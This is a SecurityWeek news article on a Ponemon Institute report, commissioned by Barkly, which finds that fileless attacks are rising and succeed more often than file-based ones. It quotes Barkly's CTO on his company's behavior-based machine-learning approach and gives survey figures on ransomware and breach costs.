Connect with us

Hi, what are you looking for?


Endpoint Security

Fileless Attacks Ten Times More Likely to Succeed: Report

A new report from the Ponemon Institute confirms, but quantifies, what most people know: protecting endpoints is becoming more difficult, more complex and more time-consuming — but not necessarily more successful.

A new report from the Ponemon Institute confirms, but quantifies, what most people know: protecting endpoints is becoming more difficult, more complex and more time-consuming — but not necessarily more successful.

Commissioned by endpoint protection firm Barkly, the report (PDF) confirms that defenders are increasingly moving away from primarily signature-based malware detection by replacing or supplementing existing defenses with additional protection or response capabilities. One third of respondents have replaced their existing AV product, while half of the respondents have retained their existing product but supplemented them with additional protections.

To combat both old and new defenses, attackers are responding with a new attack methodology — the fileless attack. Ponemon notes that 29% of attacks in 2017 have been fileless. This is up from 20% in 2016, and is expected to increase to 35% in 2018.

The fileless attack does not install detectable files. These attacks, says Ponemon, “instead leverage exploits designed to run malicious code or launch scripts directly from memory, infecting endpoints without leaving easily-discoverable artifacts behind. Once an endpoint has been compromised, these attacks can also abuse legitimate system administration tools and processes to gain persistence, elevate privileges, and spread laterally across the network.” 

According to Ponemon, 54% of companies have experienced one or more successful attacks that have compromised data and/or infrastructure, while 77% of those attacks used exploits or fileless attacks. While the attack methodology has changed, the ultimate goal of the attacker has not. Ransomware, for example, remains a major problem. Half of the surveyed organizations have suffered a ransomware incident in 2017, while 40% of those have experienced multiple incidents. The average ransomware demand is now $3,675.

The implication from these figures is that bad guys can adapt to new security faster than good guys can adapt to new attacks. Barkly’s CTO Jack Danahy doesn’t believe that this is inevitable. “For us,” he told SecurityWeek, “the problem is behavioral.” Since the bad guys will always get better at obfuscating what they are doing, plus the reality that they have equal access to the technologies that the good guys use, “you know that they are going to look for ways to get around the entire class of defense.” 

Fileless attacks are the bad guys’ response to traditional machine learning. When you look at the two bodies of technology, the older and the newer endpoint protection products, there’s a common factor — they are all file-based. They both still need a file to look at. This is what led to the development of fileless attacks. “We knew right from the beginning that we had to concentrate on stopping attacks because of their behavior, not because of any malware files they use. We had to find a way,” he explained, “to identify really low-level, really early behaviors that are representative of when malware is trying to set itself up, before it can do any corrupting activity.”

Advertisement. Scroll to continue reading.

To do this, Barkly developed a system that would examine both good behaviors and bad behaviors, and to be able to ‘disambiguate’ the two. “This is opposed to the standard method of looking for changes that have already happened or specific attributes of existing files in order to know that something bad is happening. That’s too late,” he said. 

The end result is a SaaS product that updates its ability to differentiate between good and bad behavior on a daily basis — using Barkly’s own ‘responsive machine-learning’ (a combination of both supervised and unsupervised machine learning). “It’s like a factory of bad behaviors and a factory of good behaviors, with machine learning to disambiguate the two,” he said. 

Users do not have a high opinion of most existing endpoint products, notes the Ponemon report. The average organization has seven different software agents on its endpoints to manage security, making it ‘noisy and time-consuming’. Perhaps because of the growing number of products, 73% of organizations say it is getting more difficult to manage endpoint security, and two-thirds do not have the resources to do so adequately.

The biggest problem with most current solutions, according to the Ponemon study, is that they do not provide adequate protection. Danahy is not surprised. “You cannot claim to do endpoint protection unless you can stop both file-based and fileless attacks before they get through and harm the client. A fileless attack is ten times more likely to succeed than a file-based attack.”

According to the study, the total cost of a successful attack is now over $5 million. The ‘cost of a breach’ is a contentious subject because of the variables concerned. Ponemon is known to take great care over its conclusions, but Danahy agrees it’s a difficult concept. “That’s why,” he told SecurityWeek, “I insisted on the ‘average cost per employee’ being included.” This figure stands at $301. It makes it easier for smaller firms to realistically consider the likely cost to themselves.

Ponemon’s conclusion from the study is that organizations would “benefit from endpoint security solutions designed to block new threats like fileless attacks, which are responsible for the majority of today’s endpoint compromises. To restore their faith in endpoint security’s effectiveness, new solutions need to address this crucial gap in protection without adding unnecessary complexity to endpoint management.”

Related: Fileless Trojan Kovter Poses as Firefox Update 

Related: Firms Increasingly Turn to Machine Learning for Security Solutions 

Related: Threat Hunting with Machine Learning, AI, and Cognitive Computing 

Written By

Kevin Townsend is a Senior Contributor at SecurityWeek. He has been writing about high tech issues since before the birth of Microsoft. For the last 15 years he has specialized in information security; and has had many thousands of articles published in dozens of different magazines – from The Times and the Financial Times to current and long-gone computer magazines.

Click to comment

Daily Briefing Newsletter

Subscribe to the SecurityWeek Email Briefing to stay informed on the latest threats, trends, and technology, along with insightful columns from industry experts.

Join security experts as they discuss ZTNA’s untapped potential to both reduce cyber risk and empower the business.


Join Microsoft and Finite State for a webinar that will introduce a new strategy for securing the software supply chain.


Expert Insights

Related Content

Endpoint Security

Today, on January 10, 2023, Windows 7 Extended Security Updates (ESU) and Windows 8.1 have reached their end of support dates.

Application Security

Virtualization technology giant VMware on Tuesday shipped urgent updates to fix a trio of security problems in multiple software products, including a virtual machine...

Endpoint Security

The Zero Day Dilemma

CISO Strategy

Varied viewpoints as related security concepts take on similar traits create substantial confusion among security teams trying to evaluate and purchase security technologies.

Endpoint Security

Gigabyte has announced BIOS updates that remove a recently identified backdoor feature in hundreds of its motherboards.

Application Security

Microsoft on Tuesday pushed a major Windows update to address a security feature bypass already exploited in global ransomware attacks.The operating system update, released...

Application Security

Password management firm LastPass says the hackers behind an August data breach stole a massive stash of customer data, including password vault data that...

Endpoint Security

When establishing visibility and security controls across endpoints, security professionals need to understand that each endpoint bears some or all responsibility for its own...